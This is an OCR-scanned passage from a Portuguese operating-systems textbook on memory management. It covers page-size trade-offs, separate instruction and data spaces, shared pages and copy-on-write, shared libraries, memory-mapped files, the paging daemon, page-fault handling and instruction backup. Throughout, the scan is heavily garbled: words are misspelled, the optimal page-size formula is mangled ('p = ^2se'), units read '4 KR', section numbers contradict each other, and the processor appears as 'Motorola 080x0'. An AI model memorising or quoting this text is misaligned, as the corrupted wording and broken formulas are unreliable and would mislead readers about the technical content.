ginas e, consequcniemcnte, urna grandę tabela de paginas, 
Um programa de 32 KB precisa de apenas quatro paginas 
de 8 KB, mas 64 paginas de 512 bytes. As transferencias 
entre memória e disco geralmente sao de uma pagina por 
vez, e a maior parte do tempo e gasta no posicionanieiito 
da cabcęa do Icit u ra/gra vaęao na trillia corrcta c no tempo 
dc rotaęao necessario para quc a cabeęa de Idtura/gra- 
vaęao atinja o setor corrcto, de modo que se gasta muito 
mais tempo na transferencia de paginas peąuenas do quc 
na de paginas grandes. A u ansferencia de 64 paginas de 
512 bytes, do disco para a memória, pode levar 64 x 10 ms, 
mas a Uansferencia de quatro paginas de 8 KB talvez ieve 
somente 4x12 ms. 

Em algumas maąuinas, a tabela de paginas deve ser 
carregada em registradores de hardware sempre que a CPU 
chavear de um processo para outro. Assim, nessas maąui¬ 
nas, o tempo necessario para carregar os registradores com 
a tabela dc paginas alimenta a medida que sc diminui o 
tamanho da pagina. Alem disso, o espaęo ocupado pcla ta¬ 
bela de paginas tambćm aumenta ąuando o tamanho da 
pagina diminui. 

Esic ultimo porno pode seranalisado matematicamen- 
te. Seja de s bytes o tamanho me di o dc processo e dc p 
bytes o tamanho dc pagina. Alem disso, suponha quc cada 
emrada da tabela dc paginas reąueira e bytes. O mimero 
aproximado de paginas necessarias por processo sera entao 
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de s/p paginas, ocupando, assim, se/p bytes do espaęo da ta¬ 
bela de paginas. A mernória desperdięada na ultima pagina 
cm virtude da fragmentaęao interna e dc p/2 bytes. Dcsse 
modo, o custo adidonał total cm decorrencia da tabela de 
paginas e da perda pola fragmenlaęao interna e dado pela 
soina desie s dois termos: 

custo adidonał - se/p + p/2 

O primeiro termo (tamanho da tabela dc pagi nas) e 
grandę ąuando o tamanho dc pagina p e peąueno. O se- 
gundo lenno (fragmentaęao interna), ao contrano, e gran¬ 
dę ąuando o tamanho de pagina p tambetn e grandę. O 
valor ólimo para o tamanho dc pagina deve ser unt valor 
intermediario. Caiculando a derivada primcira com relaęao 
a p c fazendo-a igual a zero, obtemos a seguinte eąuaęao: 

-se/p 2 + 1/2 = 0 

Dessa eąuaęao, pode rem os obter a expressao que da 
o tamanho ótirno de pagina (considerando semenie a me- 
mória desperdięada cm yirtudc da fragmentaęao c do ta¬ 
manho da tabela dc paginas). O resulfado c: 

p = ^2se 

Para $= 1 MB e c = 8 bytes por entrada da tabela de pa¬ 
ginas, o tamanho ólimo de pagina c 4 KR. Computadores 
comerciaimente dispomvds tern usado tamanhos de pagi¬ 
na que variam dc 512 bytes a 64 KR. Urn valor tfpico de ta- 
manho de pagina era I KR, mas atualmente 4 KB ou 8 KB 
sao mais comuns. A medida que as meinórias sc tornam 
maiores, o tamanho de pagina tambem tende a ii car maior 
(mas nao linearmente). Quadnip!icando-se o tamanho da 
mernória, raramentc duplica-sc o tamanho de pagina. 

_ 3.5.41 Espaęos separados de instruęóes e 

dados 

A maioria dos computadores tern urn espaęo imico de 
endereęamemo para programas e dados, como mostra a 
Figura 3,23 (a). Se esse espaęo de endereęamento for su- 
ficientememe grandę, uido funcionara benr. No entanto. 


muitas vezes esse espaęo e muito peąueno, o que obriga 
os programadores a sitar a ca misa para fazer ludo cabcr no 
espaęo de endereęamento. 

Urna soluęao, que apareceu pioneiramente no PDP-I l 
(16 bits), consisie em espaęos de endereęamento separados 
para instruęóes (eódigo do programa) e dados, Esscs espa¬ 
ęos sao denominados, respectivamente r espaęo I e espaęo 
D. Cada espaęo de endereęamento se sima entre 0 e um 
yalor maximo — em geral 2 14 - i ou 2 12 - 1. Na Figura 
3.23(b), vemos esses dois espaęos de endereęamento. O li- 
gador {Hnker) dcve saber ąuando espaęos separados estao 
sendo usados, pois, nessas situaęoes, os dados sao realoca- 
dos para o endereęo virtual 0, independentemente de ini- 
cializarem após o programa, 

Em um computador com esse projeto, ambos os espa¬ 
ęos de endereęamento podem ser paginados, independen¬ 
temente um do outro. Cada um deles possui sua própria 
tabela de paginas, que contcm o mapeamento indiyidual de 
paginas virtuais para molduras de pagina fisi ca. Quando o 
hardware busca uma instruęao, eie sabe que deve usar o es¬ 
paęo I e a tabela de paginas do espaęo L Da mesma manei- 
ra, referendas a os dados devem acontecer por intermedio 
da tabela dc paginas do espaęo D. A nao ser por essa dis- 
tinęao, usar espaęos separados de instruęóes e dados nao 
causa nenhuma complicaęao espccial c duplica o espaęo de 
endereęamento dlspontvd. 

5,5.51 Paginas compartilhadas 

Outro aspecto importante do projeio e o comparti- 
Ibamento de paginas. Em grandes sistemas com muhipro- 
gramaęao, e comum haver varios usuarios exectitando si- 
multaneamente o mesmo programa. f- nitidamente mais 
efkieme compartilhar paginas para evitar a situaęao de 
oislirem duas cópias ou mais da mesma pagina presem 
tes na mernória. Um pro bierna e que nem todas as paginas 
sao compartilhaveis. Em particular, as paginas somente de 
leitura — como as qtie contcm eódigo de programa — sao 
compai tilbaveis, mas paginas com dados alteraveis duranie 
a execuęao nao o sao. 
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| Figura 3.23 (a) Um espaęo de endereęamento. (b) Espaęos I e D independentem 
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Se o sistema der suporie aos espaęos i e D, o comparti- 
ihamcnto de programas sera obtido de modo relativamcnte 
direto, fazendo com que dois o li mais processos Lisem, no es¬ 
paęo l a mesma tabela de paginas em vez de ta bel as de pagi- 
nas indmduais, mas diferentes tabelas de paginas no espaęo 
D, Em geral, em nma implementaęao que suporte eompani- 
Ibamento desse tipo, labelas de paginas sao estruturas de da¬ 
dos independentes da tabela de processos. Gada processo tern, 
assnri, dois ponteiros em sua tabela de processos: urn aponia 
para a tabela de paginas do espaęo 1 e outro, para a tabela 
de paginas do espaęo D, como mostra a Figura 3.24, Q na ud o 
o escalonador escolher urn processo para ser cxecutado, cle 
usara esses ponteiros pata localizaras tabclas dc paginas apro- 
priadas e ativar a MMU. Mesmo sem espaęos 1 e D separados, 
os processos ainda podcm compartilhar programas {ou, as ve- 
ye s, bibliotecas), mas o mecanismo e mais complicado. 

Quando dois on mais processos compartilliam o mes¬ 
mo código, urn problema ocorre com as paginas co nipa r- 
tilhadas, Suponlia que os processos A e B estejam ambos 
executando o e di tor c compartilhando suas paginas, Se o 
escalonador decide remover A da memória, descartando 
todas as suas paginas e catregaiido as mokki ras de pagina 
vazias com omro programa, ele leva o processo B a causar 
muitas fal Las cle pagina, ale que suas paginas estejam nova- 
rnente presentes na memória. 

De maneira scmelhante, quando o processo A tennina 
sua execuęao, e essencial que o sistema operacional sai- 
ba quc as paginas utiliżadas pdo processo A ainda estao 
sendo utilizadas por omro processo, a firn de que o espaęo 
em disco ocupado por essas paginas nao seja ljberado ad- 
dentalmente. Em geral, e muito trabalhoso pesquisar todas 
as labelas de paginas para descobrir se urna determina- 
da pagina e compartilhada, de modo que sao necessarias 
estruturas de dados espedais para mant er o controle das 



Pro grama Dados 1 Dados 2 


Tabelas de paginas 

I Figura 3,24 Does processos que compartiiham o mesmo 
program a compartilhando sua tabela de póginas. 


Capitulo 5 Gerenciamento de memória 137 

paginas compartiihadas — especialmente se a miidade de 
compartilhamento for de urna pagina indmdual (ou de um 
conjimto delas) r em vez dc toda nma tabela dc paginas. 

Compartilhar dados e mais complicado do quc compar¬ 
tilhar código, mas nao chega a ser impo$sfvel, Por exemplo, 
no UNIX, após uma cha mada a o sistema fork, o processo pa i 
e o processo filho compartiiham código e dados. Em um sis- 
tema com paginaęao, o que muitas vezes se faz e fornecer 
a cada um desses dois processos sua própria tabela de pa¬ 
ginas, de modo qne ambos possani apontar para o mesmo 
conjimto de paginas. Assim, nenhuma cópia de paginas e 
Mta durante a exccuęao do comando fork. Contudo, todas as 
paginas de dados sao mapeadas em ambos os processos, pai e 
filho, como SOMENTE PARA LEITURA (md-cnły). 

Enąuaiito os processos estiverem apenas lendo seus 
dados, sem modifica-los, essa situaęao pode perdurar. As¬ 
sim que um dos dois processos atualizar uma palavra da 
memória, a violaęao da proteęao contra gravaęao (mid- 
-only) causara uma interrupęao, desviando-se, assim, para o 
sistema operacional, Entao, c fciia uma cópia da pagina, dc 
modo quc cada processo agora tern sua cópia parlicular, As 
duas cópias sao entao marcadas para LEITURA-ESCRITA 
[md-write) — portamo, operaęoes de escrita subsequen- 
tes em uma das duas cópias prosseguirao sem imerrupęoes. 
Essa estrategia signifi ca que paginas nao modificadas (in¬ 
du i udo todas as paginas de código) nao prerisam ser copia- 
das. Somente paginas de dados que foram realmente mo- 
difteadas devem ser copiadas separadamente. Esse metodo, 
denominado copiar-se-escrita f capy on write), melhora o 
desempenho por meto da rcduęao do mhnero dc cópias. 

5.5.61 Bibliotecas compartiihadas 

O compartilhamento pode ser feito em outras granu¬ 
la rida des alem de paginas individuais. Se nm programa for 
inidalizado duas vezes, a maioria dos sistemas operacionais 
aiitomatkamenie compartilhara todas as paginas de lexlo, 
de modo que apenas uma cópia esicja na memória. As pa¬ 
ginas de Lcxto semprc sao apenas para leitura, por isso nao 
ha nenhum problema nesse caso, Dependcmio do sistema 
operacional cada processo pode obter sua própria cópia 
privada das paginas de dados ou des podcm ser cornpar- 
tilhados e marca dos como somente leilura. Se qualquer 
processo modifiea uma pagina de dados, uma cópia priva- 
da sera feita para ele, ou seja, o metodo copiar-se-escrita 
sera aplicado. 

Em sistemas modernos, ha muitas bibliotecas grandes 
usadas por muitos processos; por exemplo, a biblioteca que 
trata a caixa de dialogo de busca de arquivos para abrir e 
de bibliotecas graficas miiltiplas. Ligar estaticamente todas 
essas bibliotecas a cada programa executavcl no disco as 
tornaria ainda mais infladas do que ja sao. 

Em vez disso, urna teenica eomum e usar bibliotecas 
compartiihadas (que sao chamadas de DLL on bibliote- 
cas de ligaęao dinamica no Windows). Para eselarecer a 
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ideia de u ma biblioteca compariilhada, primeiro considere 
a ligaęao tradidonal. Quando um programa e ligado, um 
on mais arquivos do objęto e possivelmeme algumas bi¬ 
bliotecas sao nomeados no comnndo ao vinculador, como 
o comando do UNIX 

Id \o -fc -Im 

que liga todos os arquivos {do objęto) .o no diretório atual 
e em scguida varre duas bibliotecas, / mrllibflibc.a e fusrflibf 
libm.ch Quaisquer funęocs ehamadas nos arquivos dc objęto 
mas auscntes ali (por exem.pl o, printf) recebem o nonie dc 
externas indefirtidas e sao buscadas nas bibliotecas. Se en- 
contradas, sao indufdas no arquivo binario executavel. Por 
exeniplo, sc pmrt/ prccisa de wrke, e write nao esta inclmda, 
o vinailador a buscara e induira ąuando encontrar. Quando o 
yinculador acaba, urn arqinvo binario exeoHavel e escrho 
no disco co mend o todas as fnnęoes necessarias, As funęoes 
presentes na biblioteca mas nao ehamadas nao sao inclufdas. 
Quando o programa e carregado na memória e executado, 
todas as fnnęoes de que necessita estao ali. 

Agora suponha que progranias cornuns usem 20-50 MB 
cm graiicos e funęocs dc imcrface com o usuario. Ligar 
estaticamente ccntenas de progranias com todas cssas bi¬ 
bliotecas gastaria urna quaniidade enorme de espaęo no dis¬ 
co, bem como desperdięaria espaęo em RAM ąuando eles 
fossem carrcgadoś, urna vez qnc o sistema nao Icria como 
saber que poderia compartilha-los, Ć aqui que entram as 
bibliotecas compartilhadas. Quando um programa e liga- 
do com bibliotecas compariilhadas (que sao ligeiramente 
diferentes das estaticas), em vez de induir a funęao atual 
cliamada, o vinculador inclui urna peąucna rodna de $tub 
quc liga a funęao cliamada no instante dc execuęao. De- 
pendendo do sistema e dos dctalhes dc configuraęao, as 
bibliotecas companilhadas sao carrcgadas quando o pro¬ 
gi arna e carregado ou quando funęocs ndas sao ehamadas 
pela primetra vez. E claro que, se outro programa ja livcr 
carregado a biblioteca compartiIliada, nao ha ncccssidadc 
de carrcga-la mwamente — isso e o mais importantc* Notę 
quc, ąuando unia biblioteca e carregada ou usada, nao e 
a biblioteca itueira que e lida dc unia só vez. As paginas 


entram urna a urna, de acordo com a necessidade; assim, as 
fnnęoes que nao sao ehamadas nao serao trazidas a RAM. 

Alem dc redu zir os aiquivos cxcaitaveis c dc cconomi- 
zar espaęo na memória, as bibliotecas cortipartilhadas tern 
outra vamagcm: sc urna funęao em unia biblioteca compar- 
tilhada for alualizada para remover um erro, nao e neces- 
sario recompilar os progranias que a cha ma nu Os aniigos 
arquivos binarios continuam a funcionar Essa caracie- 
rfstica e especialmente importante para softwares comer- 
ciais, em que o código-fome nao e distribufdo ao clierne. 
Por cscmplo, se a Microsoft en contra e repara um erro de 
seguranęa em algom DLL padrao, o Windows Update fara 
o download do novo DLL e subsiiluira o antigo, e todas os 
progranias que usam o DLL automaticameiitc usarao a 
nova yersaoda prćbdma vczque forem inidalizados. 

Comudo, as bibliotecas com partii ha das apresentam 
um peąucno pi obiema que devc ser resolvido. O problema 
e ilustrado na Figura 3.25. Aqui vemos dois protessos com- 
pa ni Ilia udo unia biblioteca dc lamanho de 20 KB (su pan¬ 
do que cada caixa tenha 4 KB). Entretanto, a biblioteca esta 
localizada em um endereęo diferente em cada processo, 
presumivelmente porąue os próprios progranias nao sao 
do mesmo tamanho. No processo I, a biblioteca comeęa no 
endereęo 36 KB; no processo 2, comeęa em 12 IC Suponha 
que a primeira coisa a ser feita pela primdra funęao seja 
saltarpara o endereęo Ić na biblioteca. Se a biblioteca nao 
fosse cornpartiłhada, poderia ser realocada dinamicamente 
ąuando carregada, de modo que o salto (no processo 1) 
poderia ser para o endereęo virlual 36 K + 16* Notę que 
o endereęo fisi co na RAM onde a biblioteca e localizada 
nao import a, urna vez que todas as paginas sao mapeadas 
de endercęos ffsicos para virtuais pela MMU no hardware. 

No emanio, visto que a biblioteca e compartilhada, a rca- 
locaęao dinamica nao fmicionara. Afinal, ąuando a primeira 
funęao e cliamada pelo processo 2 (no endereęo 12 K), a 
instruęno jitmp deve ir para 12 K + 16, e nao para 36 IC + 16. 
Essc e um peąucno problema. Um modo dc resolve-lo e usar 
o metodo copiar-se-escrita e criar novas paginas para cada 
processo compartilhando a biblioteca, realocando-as dina- 



Figura 3.25 Urna biblioteca com partii bada sendo usada por dois processos, 
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micamente quando sao criadas, mas e claro que esse esque- 
ma frustra o propósilo de compartilhamento da biblioteca. 

U ma soluęao md hor ć compilar bibliotccas compar- 
tilhadas com unia flag de compilador esperial, qu.c ciiz ao 
compilador para nao gerar imtruęóes que usem cndercęos 
absolutos. Em vez disso, apenas instruęoes usando endere- 
ęos re!ativos sao empregadas. Por exemplo, quase sempre 
ha uma instruęao que diz: "salte adiante (on para tras) n 
bytes (em oposięao a uma instruęao que fornece um ende- 
rcęo especifico para o qttal saltar)\ Essa instruęao funciona 
correta menie, nao importa onde a biblioteca compartilba¬ 
da esteja localizada no espaęo de cndcrcęamenlo virtual, 
Evilaudo cndercęos absolulos, o próbie ma pode ser rcsoi- 
vido. O código que uśa apenas deslocamentos rdaiivos c 
diamado de código independenta da posięao 

5.5.71 Arquivos mapeados 

As biblioteca s compartilbadas sao realnienie um caso es- 
pedał dc um recurso maisgeraL cha mado arquivos mapea¬ 
dos em memória. A ideia aqui e que um processo pode 
cmitir uma cha mada ao sistcma para mapcar um arquivo 
em uma poręao dc scu espaęo de endercęamcmo virtual. Na 
niaior parte das implcmentaędes, nenhurna pagina e irazi- 
da durante o period o do mapcamenlo, mas, a medida quc 
as paginas sao usadas, sao pagjnadas, uma a uma, por de- 
manda, usando o arquivo no disco como memória auxiliar. 
Quando o processo sai, ou explicitamente Analiza o mapea- 
menLo do arquivo, todas as paginas modificadas sao escritas 
de voka no arquivo. 

0sarquivos mapeados fornecem um modelo alternali- 
vo para E^S. Em vez de fazer leituras e gravaęoes, o arquivo 
pode ser acessado como um grandę arranjo de caracteres 
na memória. Em aigumas situaęoes, os programadores 
acham esse modelo mais comeniente, 

Se dois ou mais processos mapeiam o mesmo arquivo 
ao mesmo tempo, eles podem se co mim i car atraves da me¬ 
mória compa nil bada. Gravaęoes feitas por um processo na 
memória compariilhada sao imcdiaiameme visfveis quati- 
do o outro 1e da pane de sen espaęo de endcreęamemo 
virtual mapeado no arquivo, Dessa forma, esse arquivo for- 
necc um canal de largura de banda dcvada entre processos 
e muitas vezes e usado como tal (muilas vezes utiliza-se 
atc um arquivo lemporario). Agora deve estar claro quc, 
se arquivos mapeados em memória esiiverem dispomveis, 
as bibliotecas compartilbadas podem usar esse mecanismo. 

5.5.81 Politica de limpeza 

A paginaęao funciona mellior quando existe uma 
grandę quantidade de molduras de pagina disponfveis 
prontas a serem requisiiadas quando ocorrerem faltas de 
pagina. Se loda moldura de pagina estiver ocupada e, alem 
disso, for modificada, a mes de urna nova pagina ser carre- 
gada na memória, uma pagina antiga devera primeiro ser 
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escrita em disco. Para gara mir um estoque abundame de 
molduras de pagina disponfveis, muitos sistemas de pagi¬ 
naęao executani um processo especifico, denominado da- 
emon de paginaęao (paging daemon), que dorrne quase 
todo o tempo, mas quc c acordado periodicamente para 
insperionar o estado da memória. Se cxistircm apenas al- 
gumas molduras de pagina dispomvris, o daemon dc pagi¬ 
naęao comeęa a sdccionar as paginas a serem rcmoyklas da 
memória usando um algoritmo de substituięao de pagina, 
Se essas paginas tiverem sido modificadas desde quando 
carregadas, elas serao escritas em disco. 

Em qualquer eventualidadc, o conteudo anterior da 
pagina ć lembrado. No caso de uma pagina dcscartada da 
memória ser novamcnte rcfcrcnciada antes de su a mol- 
dura ter sido sobreposta por uma nova pagina, a moldura 
pode ser red a ma da, ou seja, trazida de volta, retiramlo-a do 
conjunto de molduras de pagina dispomvel Manter uma 
lista de molduras de pagina disponfveis fornece meihor de- 
sempenho do que pesquisar toda a memória em busca de 
uma moldura de pagina disponfvd todas as vezes em que 
isso se tornar necessario. O daemon de paginaęao garame, 
no minimo, que todas as molduras de pagina dispomveis 
estejam limpas c quc, assim, nao prcciscm ser, quando rc- 
quisitadas, escritas as pressas em disco, 

Uma maneira de implementar essa polftica de limpeza 
e usar um relógio com dois pomeiros. O ponteiro da frente 
e controlado pelo daemon de paginaęao. Quando esse pon- 
leiro apoma para uma pagina suja, essa pagina e escrita em 
disco e o ponteiro avanęa. Quando apoma para uma pagina 
iimpa, cle apenas avanęa. O ponteiro dc tras ć usado para 
substituięao de pagina, assim como no algoritmo-pa dra o 
do relógio, só quc, agora, a próbabilidadc dc o ponteiro de 
tras apontar para uma pagina lirnpa a u men la em virtude 
do trabalho do daemon de paginaęao. 

3.5.91 interface da memória virtual 

Ale agora, supomos quc a memória virtual seja irans- 
parenie a processos e programadores — isto e, tudo o que 
sc vc e um grandę espaęo de endereęamento virtual em um 
compmador com memória ifsica menor, Em muitos siste¬ 
mas isso e verdade, mas, em alguns sistemas avanęados, os 
programadores dispoem dc algum conttole sobre o mapa 
de memória e podem usa-lo de maneiras nao tradicionais 
para aumentar o desempenho do programa. Nesta seęao, 
discuiiremos brcvememc aigumas dessas maneiras. 

Uma razao para dar o controle do mapa de memória a 
programadores e permitir que dois ou mais processos com- 
partilbem a mesma memória. Se os programadores pude- 
rem nomear regioes de memória, talvez se torne possivel 
a um processo forncccr a outro o nonie dc uma regiao, de 
modo que esse segundo processo tambein possa ser ma¬ 
peado na mesma regiao do primeiro. Com dois (ou mais) 
processos compa nil bando as rnesmas paginas, surge a pos- 
sibilidade de um eompanilhamcmo em largura de banda 
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elevada — ou seja P um processo escreve na memória com- 
partilhada e ooutro le dessa mesma memória. 

0 compartilhamento dc paginas tambem pode ser usa- 
do na impkmentaęao de um sistema de troca de mensagens 
de altu desempenho. Hm geral na troca de mensagens, 
dados san copiados de um espaęo de endereęamemo para 
outro, a um cusio consideravel. Se os processos puderem 
controlar seus mapeamentos, urna mensa gem pode ni ser 
irocada retirando-se a pagina relacionada do mapeamento 
do processo emissor e inserindo-a no mapeamento do pro¬ 
cesso receptor. Nesse caso, semenie os nomes de paginas 
devcm ser copiados, cm vcz dc todos os dados. 

Outra tecnica avanęada de gerenciamenlo de memória 
e a memória compartiihada distribuida (Feeley ei al., 
1995; LL I9S6; Li e Hudak, 1989; Zekauskas ei aL, 1994). 
A ideia e permiiir que varios proces sos em urna rede com- 
partilhem um conjimto de paginas — posstvd P mas nao 
nccessariamentc — por intermedio de um unico espaęo dc 
cndercęamento linear compartilhado, Quando um proces¬ 
so referenda urna pagina nao alualmentc mapeada, isso 
causa urna falta dc pagina, 0 manipulador dc falta dc pa¬ 
gina (que pode estar no niicleo ou no espaęo de usuario) 
localiza a maqui na que contem a referida pagina e ma uda 
um pedido para liberar essa pagina de seu mapeamento e 
enviada pda rede. Quando a pagina chega, ela e mapeada 
na memória e a instruęao que causou a falta de pagina e 
reinicializada. No Capftulo S, exammaremos rnais detallia- 
damentea memória compartiihada distribuida. 



Questoes de implementaęao 


Para a implementaęao de sistemas dc memória virtual, 
os implcmcntadores tern dc escolher entre os prindpais 
algoritmos teóricos vi$tos, como: segunda ebance ver$u$ 
erwelherimenio {cigirtg), alocaęao local ver$m global c pagi- 
naęao por demanda versus paginaęao antecipada. Mas des 
tambem dcvem estar rientes de inumeras outras ąuestóes 
praticasde implementaęao, Nesta seęao, introduziremos os 
problemas mais commis e algumas das soluęoes posstveis. 


_ 3-6.1 I Envolvimento do sistema 

operacional com a paginaęao 

Existem ąuatro circtin stand as em que o sistema ope- 
rational tern dc se envo!ver com a paginaęao: na criaęao 
do processo, no tempo de cxecuęao do processo, na ocor- 
rencia dc falta de pagina e na finalizaęao do processo. 
Ycrcmos rapidamentc ca da um desses moment os para sa- 
ber como proceder, 

Qiiando um novo processo e criado em um sistema 
com paginaęao, o sistema operacional deve determinar 
qual sera o tamanho (inicial) do programa e de seus dados 
e criar unia tabela dc paginas para eles. Um espaęo prccisa 
ser alocado na memória para a tabela dc paginas, e esta dcvc 
ser inicializada. A tabela dc paginas nao prccisa estar 


presente na memória quando o processo e levado para dis¬ 
co, mas ela tern de estar na memória quando o processo 
estiver em execuęao. Alem disso, um espaęo deve ser alo¬ 
cado na area dc trocas do disco {swap area), dc modo que P 
ąuando uina pagina c devolvida ao disco, da tenha para 
onde ir, A area dc trocas tambem dcvc ser inicializada com 
o código do programa c os dados, para que, ąuando o novo 
processo comeęar a causar falias de pagina, as paginas pos¬ 
sani ser trazidas do disco para a memória. Alguns sistemas 
paginam o programa diretamente do arquivo executavel 
economizando, assim, espaęo em disco e tempo de micia- 
lizaęao. Por fhn P informaęoes acerca da tabela de paginas e 
da area de irocas de processos em disco devem ser regis- 
tradas na labela de processos. 

Quando um processo e escalonado para cxecuęao, a 
MMU leni dc ser reinicializada para o novo processo, e a 
TLB, esvaziada para livrar-se de restduos do processo exe- 
cutado ameriormente. A tabela de paginas do novo proces¬ 
so deve tornar-se a tabela atual, o qtte em geral e feito co- 
piando-se a tabela ou um ponteiro para ela em algum(ns) 
registrador(es) em hardware. Opdonalmente, algumas 
paginas do processo — ou todas elas ■— podem ser trazi- 
das para a memória a firn dc reduzir o numero inicial de 
faltas dc pagina. 

Quando ocorre u ma falta de pagina, o sistema opera - 
cional tem de ler o(s) registrador(es) em hardware para 
determinar o endereęo virtual causador da falta de pa¬ 
gina. A partir dessa informaęao, ele prccisa caicular qual 
pagina virtual e reąiuskada e P en tao, localiza-la cm disco, 
Em seguida, cle procura urna moldura de pagina disponi- 
vcl para colocar a nova pagina, descartando, sc neccssario, 
alguma pagina antiga. No passo seguinte, cle dcvc carrcgar 
a pagina reguisitada do disco para a moldura de pagina. 
Por fim, o sistema operacional tein de salvar o comador 
de programa para que ele aponte para a insiruęao qtie 
causou a falta de pagina, de modo que possa ser executa- 
da novamente. 

Q u and o um processo termina, o sistema operacional 
deve liberar sua tabela dc paginas, suas paginas c o espaęo 
em disco que as paginas ocupam. Se algumas das paginas 
forem companilhadas com outros processos, as paginas na 
memória e em disco só poderao ser liberadas ąuando o ul¬ 
timo processo que as usar for fmalizado. 

3.6.21 Tratamento de falta de pagina 

Finalmeme estamos em condięoes de descrever, com 
alguns detalhes, o que ocorre durante urna falta de pagina, 
A seąuencia de eventos acontece da seguinte maneira: 

L O hardware gera urna interrupęao que desvia a exe- 
cuęao para o niicleo, salvando o contador de pro- 
grama na pilha. Na maioria das maquinas P algumas 
informaęoes acerca do estado da insiruęao atual- 
mente cm cxecuęao tambem sao salvas cm registra- 
dores espcciais na CPU. 
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2. Uma rotina em código de momagem e ativada para 
salvai o conteudo dos registradoics dc uso geral e 
outras inforniaęÓes volateis, a firn de impedir que o 
sistema operadonal o destrua, Essa rotina chama a sis- 
tema operacional como um procedimento. 

3. O sistema operacional descobre a ocorrenda de urna 
falta de pagina e tema identificar qual pagina virtuai 
e necessaria. Muitas vezes, um dos registradores em 
hardware eoniem essa informaęao. Do contrario, o 
sistema operacional deve resgatar o contador dc pro- 
grama, buscara instruęao e analisa-la por software para 
descobrir qtial referenda gerou essa falta de pagina. 

4. Uma vez conhcddo o endereęo virtual causadoF da 
falta dc pagina, o sistema operacional vcriftca secsse 
endereęo e valido e se a proteęao e c on s i sten te com o 
acesso* Se na o, o processo retebe um smal on e elimi- 
nado. Se o endereęo for valido e nenhuma violaęao de 
proteęao tiver ocorrido, o sistema vcrificnra se existe 
uma moldura dc pagina disponwel Se nenhuma mol- 
dura dc pagina cstiver disponwcL o algoritmo de subs- 
tituięao sera executado para sdecionar uma vftima, 

5. Se o conteudo da moldura de pagina tiver sklo ino- 
dificado, a pagina sera escalonada para ser trans- 
ferida para o disco; um chaveamento de contexto 
sera realizado, ou seja, sera suspenso o processo 
causa do r da falta dc pagina e outro processo sera 
execu tado a te que a transferencia da pagina para 
disco len ha sido completnda. Dc qualquer modo, a 
moldura de pagina e marcada como nao di sporny cl 
para impedir quc seja usada com outro propósito. 

6. Tao logo a moldura de pagina seja limpa (imediata- 
inentc ou após ter sido escrita em disco), o sistema 
operacional buscara o endereęo em disco onde esta 
a pagina virtual sol i ci ta da e e scal o tiara uma opera- 
ęao cm disco para trazć-la para a memória. Enquali¬ 
to a pagina estiver sen do carregada na memória, o 
processo causador da falta de pagina sera mantido 
em suspenso e outro processo sera cxecutado, caso 
exisia. 

7. Quando a interrupęao dc disco indicar que a pagi¬ 
na chegou na memória, as tabelas dc paginas serao 
atualjzadas para reffetirsua posięao, c sera indicado 
que a moldura dc pagina esta cm estado norma I. 

8. A instruęao causadora da falta de pagina e recupcra- 
da para o estado em que ela se en co mowa ąuando 
comcęou sua execuęao, e o contador de programa e 
rei n tria li za do, a firn de apontar para aquela instruęao, 

9. O processo causador da falta de pagina e escalonado 
para execuęao, e o sistema operacional retoma para 
a rotina, cm Unguagem de maąuina, que a chamom 

10. Essa rotina recarrega os registradores e outras in- 
formaęocs de estado e rciorna ao espaęo de usuario 
para continuar a execuęaQ, como se nada tivesse 
ocorrido. 


5.6.51 Backup de instruęao 

Quando um programa referenda uma pagina nao pre- 
sente na memória, a instruęao causadora da falta de pagina 
e bloąueada no meio de sua execiięao e ocorre uma imer- 
rupęao, desviando-se assim para o sistema operacional. Após 
o sistema operacional huscar em disco a pagina necessaria, 
dc devera reinicializara instruęao causadora da interrupęao, 
Isso e mais faril de cxplicar do que de implcmeniar. 

Para emender melhor esse problema em seu piór grau, 
imagine uma CPU que tenha instruęoes dc dois endereęos, 
como o Motorola 080x0, amplamente milizado em siste- 
mas embarcados. Por cxemplo, a instruęao 

MOV.L #6(A1),2(A0) 

e de 6 byies (veja a Figura 3.26). Para rdnioializar essa ins- 
truęao, o sistema operacional deve determinar onde se em 
contra o primeiro byle da instmęao. O valor do comador de 
programa no instame da interrupęao depende de qua! 
operando causou a falta de pagina e de como o microcódi- 
go da CPU foi implementacjo. 

Na Figura 3,26, temos uma instruęao que se inicializa 
no endereęo 1000 e que faz tres refereneias a memória: a 
própria palavra de instruęao e os dois deslocamentos dos 
operandos. Dependendo de qual dessas tres refereneias 
liver causado a falta de pagina, o contador de programa 
pode ser 1000, 1002 ou 1004 no instante da falta, Muitas 
vezes e imposswel ao sistema operacional determinar pre- 
cisamente onde a instruęao se inicializa. Se o comador de 
programa estiver na posięao 1002 no instante da ocorren- 
cia da falta de pagina, o sistema operacional nao dispora de 
mcios para determinar se a palavra no endereęo 1002 e um 
endereęo dc memória assodado a uma instruęao em 1000 
(por exemp]o, a posięao de um operando) ou se e o próprio 
código de operaęao da instruęao. 

Apesar dc esse ja ser um grandę problema, cle poderia 
ser ainda piór. Alg mis modos de endereęamento do 680x0 
u sam autoincrcmemo, o que signiflca que o de i to cola te¬ 
ra) da execuęao dessa instruęao e inerementar um ou mais 
registradores. lustruęoes que empregam autoincrcmento 
tambeni sao capazes dc causar falta dc pagina. Dependendo 
dos deialhes do microcódigo, o i n eremem o pode ser feito 
aiues da referenda a memória, obrlgando o sistema opera- 
donal a realizar o decrcmento do registrador por software 
arnes de reexeculara instruęao. Ou o amoincremenlopode 
ser feito após a referenda a memória, e assim o sistema 


MOVE.L#6(A1), 2(A0) 


16 Bits 


1000 

1002 

1004 


MOVE 


6 


Código do operaęao 
Primeiro operando 
Segundo operando 


Figura 3,26 Uma instmęao provocando uma falta da 
pagina. 
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operacional nao tem de desfaze-lo nesse caso, pois o incre- 
mento ainda nao tera ocorrido no momento da interrupęao, 
Tambem pode exisiir o auiodccrcmcnio, ca pa 7 dc causa r 
lim prób lenia similar. Detalhes precisos quc Informam se 
o autoincremento e o autodecremento sao fcitos antes ou 
depois da referenda a memória podcm diferir dc instruęao 
para instruęao c de u ma CPU para outra* 

Felizinente, em algumas maquinas os projetisias da 
CPU forneeem u ma soluęao, geral menie na forma de urn 
registrador interno escondklo em que o conteudo do eon- 
tador de programa e salvo antes de cada instruęao ser exe- 
culada* Essa* maqumas tambem podcm ter um segundo 
registrador, quc informa quais registradores sofreram au¬ 
toincremento ou autodeeremento e de quanto e o va!or. 
Com cssas infonnaęoes, o sistema operacional pode desfa- 
zer sem ambiguidade todos os efeitos da instruęao causa de¬ 
ra da falta de pagina, de modo quc possa ser reexecutada. 
Se essas informaęoes nao esiivcrern disponfveis, o sistema 
operacional precisara se desdobrar para descobrir o que 
